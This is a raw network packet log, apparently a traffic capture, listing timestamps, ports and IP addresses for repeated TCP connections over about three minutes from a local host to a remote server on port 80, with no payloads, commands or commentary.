Dec 15, 2024 00:22:35.358063936 CET	49741	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:40.314357996 CET	49742	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:40.436177969 CET	80	49742	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:40.436366081 CET	49742	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:40.436460018 CET	49742	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:40.557915926 CET	80	49742	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:40.559494019 CET	80	49742	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:41.899338961 CET	80	49742	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:41.951641083 CET	49742	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:44.751068115 CET	80	49742	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:44.751259089 CET	49742	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:44.751641035 CET	80	49741	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:44.751687050 CET	49741	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:44.752288103 CET	80	49739	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:44.752336025 CET	49739	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:46.905323982 CET	49742	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:46.905951023 CET	49743	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:47.025103092 CET	80	49742	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:47.025594950 CET	80	49743	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:47.025681019 CET	49743	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:47.025840044 CET	49743	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:47.145601988 CET	80	49743	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:47.145694017 CET	80	49743	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:48.362159967 CET	80	49743	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:48.404617071 CET	49743	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:53.374511003 CET	49743	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:53.374511003 CET	49744	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:53.494291067 CET	80	49744	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:53.494498968 CET	49744	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:53.494517088 CET	80	49743	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:53.494647026 CET	49744	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:53.494704962 CET	49743	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:53.614336014 CET	80	49744	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:53.614496946 CET	80	49744	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:54.828996897 CET	80	49744	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:54.873379946 CET	49744	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:59.843122959 CET	49744	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:59.846425056 CET	49746	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:00.004369020 CET	80	49746	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:00.004573107 CET	80	49744	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:00.004645109 CET	49744	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:00.004645109 CET	49746	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:00.004884005 CET	49746	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:00.124608040 CET	80	49746	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:00.124792099 CET	80	49746	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:01.375571012 CET	80	49746	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:01.420429945 CET	49746	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:06.394625902 CET	49746	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:06.395443916 CET	49763	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:06.516084909 CET	80	49746	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:06.516138077 CET	49746	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:06.516798019 CET	80	49763	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:06.516990900 CET	49763	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:06.516992092 CET	49763	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:06.638781071 CET	80	49763	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:06.640357971 CET	80	49763	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:08.008574009 CET	80	49763	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:08.011240005 CET	49763	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:08.131690025 CET	80	49763	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:08.132297039 CET	49763	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:13.015363932 CET	49779	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:13.135292053 CET	80	49779	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:13.135427952 CET	49779	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:13.135539055 CET	49779	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:13.255736113 CET	80	49779	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:13.255821943 CET	80	49779	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:14.475341082 CET	80	49779	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:14.529777050 CET	49779	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:19.483671904 CET	49779	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:19.484435081 CET	49795	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:19.603894949 CET	80	49779	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:19.604070902 CET	49779	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:19.604403019 CET	80	49795	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:19.604464054 CET	49795	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:19.604608059 CET	49795	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:19.724339962 CET	80	49795	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:19.724498034 CET	80	49795	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:20.955966949 CET	80	49795	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:20.998439074 CET	49795	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:25.968300104 CET	49795	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:25.969541073 CET	49811	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:26.088320017 CET	80	49795	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:26.088365078 CET	49795	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:26.089303970 CET	80	49811	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:26.089510918 CET	49811	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:26.089617968 CET	49811	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:26.209368944 CET	80	49811	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:26.209497929 CET	80	49811	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:27.492877007 CET	80	49811	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:27.545458078 CET	49811	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:32.499027014 CET	49811	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:32.499528885 CET	49827	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:32.619075060 CET	80	49811	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:32.619291067 CET	80	49827	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:32.619498014 CET	49811	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:32.619498014 CET	49827	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:32.619623899 CET	49827	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:32.739393950 CET	80	49827	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:32.739496946 CET	80	49827	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:33.955064058 CET	80	49827	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:33.998459101 CET	49827	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:38.967772961 CET	49827	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:38.968488932 CET	49842	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:39.088141918 CET	80	49827	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:39.088350058 CET	49827	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:39.088359118 CET	80	49842	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:39.088579893 CET	49842	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:39.088579893 CET	49842	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:39.208518982 CET	80	49842	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:39.208597898 CET	80	49842	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:40.428457022 CET	80	49842	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:40.482914925 CET	49842	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:45.437021017 CET	49842	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:45.438209057 CET	49858	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:45.557482004 CET	80	49842	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:45.557651997 CET	49842	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:45.557908058 CET	80	49858	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:45.557996988 CET	49858	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:45.558192015 CET	49858	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:45.678071976 CET	80	49858	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:45.678138971 CET	80	49858	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:47.018378973 CET	80	49858	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:47.060977936 CET	49858	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:52.030221939 CET	49858	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:52.031178951 CET	49874	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:52.150667906 CET	80	49858	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:52.150902987 CET	49858	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:52.151089907 CET	80	49874	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:52.151272058 CET	49874	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:52.151367903 CET	49874	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:52.271186113 CET	80	49874	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:52.271296024 CET	80	49874	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:53.486313105 CET	80	49874	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:53.530245066 CET	49874	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:58.594888926 CET	49874	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:58.596956968 CET	49890	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:58.715017080 CET	80	49874	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:58.715244055 CET	49874	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:58.716711044 CET	80	49890	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:58.717533112 CET	49890	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:58.738325119 CET	49890	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:23:58.858211040 CET	80	49890	92.53.106.114	192.168.2.4
Dec 15, 2024 00:23:58.858236074 CET	80	49890	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:00.080388069 CET	80	49890	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:00.124238968 CET	49890	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:05.098005056 CET	49890	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:05.100008965 CET	49906	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:05.218324900 CET	80	49890	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:05.219948053 CET	80	49906	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:05.222714901 CET	49906	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:05.222780943 CET	49890	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:05.239721060 CET	49906	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:05.359884977 CET	80	49906	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:05.359924078 CET	80	49906	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:06.561363935 CET	80	49906	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:06.764132977 CET	49906	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:11.578739882 CET	49906	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:11.578739882 CET	49922	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:11.698605061 CET	80	49922	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:11.698761940 CET	49922	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:11.698849916 CET	49922	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:11.698858976 CET	80	49906	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:11.698995113 CET	49906	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:11.818609953 CET	80	49922	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:11.818721056 CET	80	49922	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:13.036046982 CET	80	49922	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:13.105408907 CET	49922	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:18.046538115 CET	49922	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:18.046551943 CET	49938	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:18.166960001 CET	80	49938	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:18.167000055 CET	80	49922	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:18.167149067 CET	49922	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:18.167166948 CET	49938	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:18.167455912 CET	49938	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:18.287192106 CET	80	49938	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:18.287410021 CET	80	49938	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:19.518748045 CET	80	49938	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:19.639271021 CET	49938	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:24.530476093 CET	49938	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:24.531476974 CET	49954	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:24.651848078 CET	80	49938	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:24.652020931 CET	49938	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:24.652570009 CET	80	49954	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:24.652662039 CET	49954	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:24.653124094 CET	49954	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:24.772887945 CET	80	49954	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:24.773055077 CET	80	49954	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:25.988720894 CET	80	49954	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:26.104152918 CET	49954	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:31.000160933 CET	49970	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:31.000164986 CET	49954	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:31.120501995 CET	80	49970	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:31.120826960 CET	80	49954	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:31.124255896 CET	49970	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:31.124389887 CET	49954	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:31.124542952 CET	49970	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:31.244474888 CET	80	49970	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:31.244509935 CET	80	49970	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:32.463556051 CET	80	49970	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:32.514175892 CET	49970	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:37.467999935 CET	49970	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:37.469118118 CET	49986	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:37.588114977 CET	80	49970	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:37.588187933 CET	49970	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:37.588871002 CET	80	49986	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:37.589040995 CET	49986	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:37.589167118 CET	49986	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:37.708956003 CET	80	49986	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:37.709048986 CET	80	49986	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:38.943627119 CET	80	49986	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:39.062387943 CET	49986	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:43.954691887 CET	50002	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:44.074675083 CET	80	50002	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:44.074943066 CET	50002	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:44.075038910 CET	50002	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:44.194818020 CET	80	50002	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:44.195008039 CET	80	50002	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:45.462353945 CET	80	50002	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:45.514203072 CET	50002	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:50.471507072 CET	50002	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:50.471926928 CET	50017	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:50.591727972 CET	80	50002	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:50.591876030 CET	80	50017	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:50.592011929 CET	50002	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:50.592355013 CET	50017	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:50.592355967 CET	50017	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:50.713634014 CET	80	50017	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:50.715316057 CET	80	50017	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:51.935606956 CET	80	50017	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:52.047622919 CET	50017	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:56.954658985 CET	50017	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:56.954797983 CET	50030	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:57.074596882 CET	80	50030	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:57.074853897 CET	50030	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:57.074853897 CET	50030	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:57.074908018 CET	80	50017	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:57.078584909 CET	50017	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:24:57.194886923 CET	80	50030	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:57.194920063 CET	80	50030	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:58.428715944 CET	80	50030	92.53.106.114	192.168.2.4
Dec 15, 2024 00:24:58.483196020 CET	50030	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:03.436611891 CET	50030	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:03.437567949 CET	50031	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:03.557054996 CET	80	50030	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:03.557122946 CET	50030	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:03.557324886 CET	80	50031	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:03.557538986 CET	50031	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:03.557894945 CET	50031	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:03.677690029 CET	80	50031	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:03.677870989 CET	80	50031	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:04.904489040 CET	80	50031	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:04.952235937 CET	50031	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:09.921243906 CET	50031	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:09.921998978 CET	50032	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:10.041666031 CET	80	50031	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:10.041763067 CET	80	50032	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:10.041830063 CET	50031	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:10.041863918 CET	50032	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:10.041970015 CET	50032	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:10.161860943 CET	80	50032	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:10.161894083 CET	80	50032	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:11.384875059 CET	80	50032	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:11.385188103 CET	50032	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:11.505666018 CET	80	50032	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:11.505743980 CET	50032	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:16.391290903 CET	50033	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:16.512542963 CET	80	50033	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:16.515415907 CET	50033	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:16.515415907 CET	50033	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:16.636876106 CET	80	50033	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:16.638437986 CET	80	50033	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:17.863615990 CET	80	50033	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:17.904853106 CET	50033	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:22.874445915 CET	50033	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:22.876252890 CET	50034	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:22.995402098 CET	80	50033	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:22.996082067 CET	50033	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:22.997117043 CET	80	50034	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:22.997456074 CET	50034	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:22.997457027 CET	50034	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:23.117254972 CET	80	50034	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:23.117366076 CET	80	50034	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:24.338450909 CET	80	50034	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:24.389362097 CET	50034	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:29.347182989 CET	50034	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:29.347204924 CET	50035	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:29.467495918 CET	80	50035	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:29.467609882 CET	50035	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:29.467695951 CET	50035	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:29.467711926 CET	80	50034	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:29.467901945 CET	50034	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:29.587496996 CET	80	50035	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:29.587537050 CET	80	50035	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:31.583575010 CET	80	50035	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:31.719892979 CET	50035	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:36.593183994 CET	50035	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:36.594302893 CET	50036	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:36.713560104 CET	80	50035	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:36.713892937 CET	50035	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:36.714108944 CET	80	50036	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:36.714545012 CET	50036	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:36.714545012 CET	50036	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:36.834386110 CET	80	50036	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:36.834628105 CET	80	50036	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:38.188071012 CET	80	50036	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:38.358248949 CET	50036	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:43.202346087 CET	50036	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:43.202915907 CET	50037	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:43.322814941 CET	80	50036	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:43.322860956 CET	80	50037	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:43.322909117 CET	50036	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:43.323134899 CET	50037	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:43.323329926 CET	50037	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:43.443058014 CET	80	50037	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:43.443180084 CET	80	50037	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:44.724812984 CET	80	50037	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:44.764839888 CET	50037	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:49.734041929 CET	50037	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:49.735137939 CET	50038	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:49.854487896 CET	80	50037	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:49.854536057 CET	50037	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:49.854938030 CET	80	50038	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:49.855159998 CET	50038	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:49.855159998 CET	50038	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:49.975157022 CET	80	50038	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:49.975393057 CET	80	50038	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:51.207681894 CET	80	50038	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:51.358166933 CET	50038	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:53.944783926 CET	80	49986	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:53.944957972 CET	49986	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:56.220257044 CET	50039	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:56.220274925 CET	50038	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:56.342174053 CET	80	50039	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:56.342242956 CET	50039	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:56.342473030 CET	80	50038	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:56.342593908 CET	50039	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:56.342660904 CET	50038	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:25:56.464432955 CET	80	50039	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:56.466078997 CET	80	50039	92.53.106.114	192.168.2.4
Dec 15, 2024 00:25:57.731822014 CET	80	50039	92.53.106.114	192.168.2.4
